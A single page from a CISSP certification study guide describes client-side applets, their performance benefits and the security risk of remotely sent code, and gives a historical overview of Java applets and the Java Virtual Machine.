Page 582 - (ISC)² CISSP Certified Information Systems Security Professional Official Study Guide
P. 582

itself. This provides a number of benefits to both the remote server
               and the end user:

                    The processing burden is shifted to the client, freeing up resources

                    on the web server to process requests from more users.

                    The client is able to produce data using local resources rather than
                    waiting for a response from the remote server. In many cases, this
                    results in a quicker response to changes in the input data.

                    In a properly programmed applet, the web server does not receive
                    any data provided to the applet as input, therefore maintaining the

                    security and privacy of the user’s financial data.

               However, just as with agents, applets introduce a number of security
               concerns. They allow a remote system to send code to the local system
               for execution. Security administrators must take steps to ensure that
               code sent to systems on their network is safe and properly screened for
               malicious activity. Also, unless the code is analyzed line by line, the
               end user can never be certain that the applet doesn’t contain a Trojan

               horse component. For example, the mortgage calculator might indeed
               transmit sensitive financial information to the web server without the
               end user’s knowledge or consent.

               Two historical examples of applet types are Java applets and ActiveX
               controls.

               Java Applets Java is a platform-independent programming
               language developed by Sun Microsystems (now owned by Oracle).
               Java is largely superseded by modern applications, and it is no longer

               supported directly in most browsers. However, you should still have a
               basic understand of Java as it may still be in use internally or
               supported in the specific browser implemented by your organization.
               While modern web design has moved away from Java, this does not
               mean Java has been scrubbed off the internet. Most programming
               languages use compilers that produce applications custom-tailored to

               run under a specific operating system. This requires the use of
               multiple compilers to produce different versions of a single application
               for each platform it must support. Java overcomes this limitation by
               inserting the Java Virtual Machine (JVM) into the picture. Each
   577   578   579   580   581   582   583   584   585   586   587